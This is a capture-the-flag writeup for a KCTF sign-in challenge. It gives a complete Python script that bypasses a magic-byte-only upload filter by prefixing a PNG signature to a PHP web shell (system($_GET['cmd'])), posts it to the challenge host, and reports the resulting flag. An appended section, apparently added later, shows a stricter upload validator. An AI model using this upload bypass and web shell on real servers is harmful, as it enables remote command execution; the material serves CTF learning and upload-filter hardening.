[Original] KCTF Sign-in Challenge 逐光启航 WriteUp
Posted on: 2024-8-21 16:10


The challenge's main page contains a link to hint.php.
The page source of hint.php contains a base64-encoded reference to hidden_page.php.
hidden_page.php turns out to be an upload form; it reports that only .jpg and .png files are accepted.
Testing shows that the server's format check looks only at the file header (magic bytes) and does not restrict the file extension, so a PHP file carrying an image header can be uploaded:

import socket
import ssl
from http.client import HTTPResponse


def sendraw(host, port, data, tls=False):
    """Send a raw HTTP request over a plain or TLS socket and return the response body."""
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((host, port))
    if tls:
        # ssl.wrap_socket() was removed in Python 3.12; wrap through a context instead
        s = ssl.create_default_context().wrap_socket(s, server_hostname=host)
    if isinstance(data, str):
        data = data.encode('latin-1')
    s.sendall(data)
    resp = HTTPResponse(s)
    resp.begin()
    res = resp.read()
    s.close()
    return res


BOUNDARY = b'----WebKitFormBoundarydhHx9Ablqmk1ZA7n'
# Request line and headers; Content-Length is filled in once the body is built.
# The original request also carried Origin and Referer headers, but the forum's
# link obfuscation mangled their values, so they are omitted here.
header_part1 = (b'POST /hidden_page.php HTTP/1.1\r\n'
                b'Host: 0bfdcec0-7c78-45ba-a7b9-1c58ac076038.node.pediy.com:81\r\n'
                b'Content-Length: ')
header_part2 = (b'\r\nCache-Control: max-age=0\r\n'
                b'Upgrade-Insecure-Requests: 1\r\n'
                b'Content-Type: multipart/form-data; boundary=' + BOUNDARY + b'\r\n'
                b'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36\r\n'
                b'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7\r\n'
                b'Accept-Encoding: gzip, deflate\r\n'
                b'Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7\r\n'
                b'Connection: close\r\n\r\n')

# Multipart body: the file part is declared as image/png but named test.php
data_part1 = (b'--' + BOUNDARY + b'\r\n'
              b'Content-Disposition: form-data; name="upload_file"; filename="test.php"\r\n'
              b'Content-Type: image/png\r\n\r\n')
data_part2 = (b'\r\n--' + BOUNDARY + b'\r\n'
              b'Content-Disposition: form-data; name="submit"\r\n\r\n'
              b'\xe4\xb8\x8a\xe4\xbc\xa0\r\n'   # the submit button's value, "上传" (Upload), in UTF-8
              b'--' + BOUNDARY + b'--\r\n')

# File content: only the 8-byte PNG signature taken from a real image, then the PHP code.
# The server checks the header bytes but not the extension, so this passes the filter.
file_data = open('anypic.png', 'rb').read()[:8] + b'<?php system($_GET[\'cmd\']); ?>'

body = data_part1 + file_data + data_part2
payload = header_part1 + str(len(body)).encode('latin-1') + header_part2 + body

r = sendraw('123.57.66.184', 81, payload)
print(r)

The challenge also exposes an upload directory; requesting upload/test.php reaches the uploaded PHP shell.

This yields the flag: flag{a7031be5-c28f-4c14-ad3d-9a763702c05d}
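As an added defensive illustration (not code from the writeup or the challenge): the header-only check described above, beside a stricter validator that combines an extension allowlist with a full PNG chunk walk, so that a PNG signature followed by PHP code no longer passes. The function names and the constructed sample image are my own assumptions.

```python
import os
import struct
import zlib

PNG_SIG = b'\x89PNG\r\n\x1a\n'
ALLOWED_EXT = {'.png'}   # .jpg would need its own structural check; PNG only here


def weak_check(data: bytes) -> bool:
    """Header-only check, matching the challenge's behaviour: anything
    starting with the PNG signature passes, whatever follows it."""
    return data.startswith(PNG_SIG)


def png_structure_ok(data: bytes) -> bool:
    """Walk the PNG chunk list: IHDR first, IEND last, every CRC valid,
    and no stray bytes (such as a PHP payload) before or after the chunks."""
    if not data.startswith(PNG_SIG):
        return False
    pos, first, last = len(PNG_SIG), None, None
    while pos + 12 <= len(data):
        length, ctype = struct.unpack('>I4s', data[pos:pos + 8])
        body = data[pos + 8:pos + 8 + length]
        crc = data[pos + 8 + length:pos + 12 + length]
        if len(body) != length or len(crc) != 4:
            return False   # declared chunk length runs past the end of the data
        if zlib.crc32(ctype + body) != struct.unpack('>I', crc)[0]:
            return False   # bytes that are not a real chunk fail the CRC
        first, last = first or ctype, ctype
        pos += 12 + length
    return pos == len(data) and first == b'IHDR' and last == b'IEND'


def hardened_check(filename: str, data: bytes) -> bool:
    """Extension allowlist first, then a content check that matches the extension."""
    ext = os.path.splitext(filename)[1].lower()
    if ext not in ALLOWED_EXT:
        return False   # test.php is rejected before any content is inspected
    return png_structure_ok(data)


def _chunk(ctype: bytes, body: bytes) -> bytes:
    crc = struct.pack('>I', zlib.crc32(ctype + body))
    return struct.pack('>I', len(body)) + ctype + body + crc


def minimal_png() -> bytes:
    """Constructed 1x1 8-bit grayscale PNG, used as the known-good sample."""
    ihdr = struct.pack('>IIBBBBB', 1, 1, 8, 0, 0, 0, 0)
    idat = zlib.compress(b'\x00\x00')   # filter byte + one pixel
    return PNG_SIG + _chunk(b'IHDR', ihdr) + _chunk(b'IDAT', idat) + _chunk(b'IEND', b'')
```

Storing uploads under a server-chosen name with the validated extension, outside any directory the web server executes scripts from, closes the remaining path to upload/test.php.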



Last edited by tacesrever on 2024-9-6 13:22.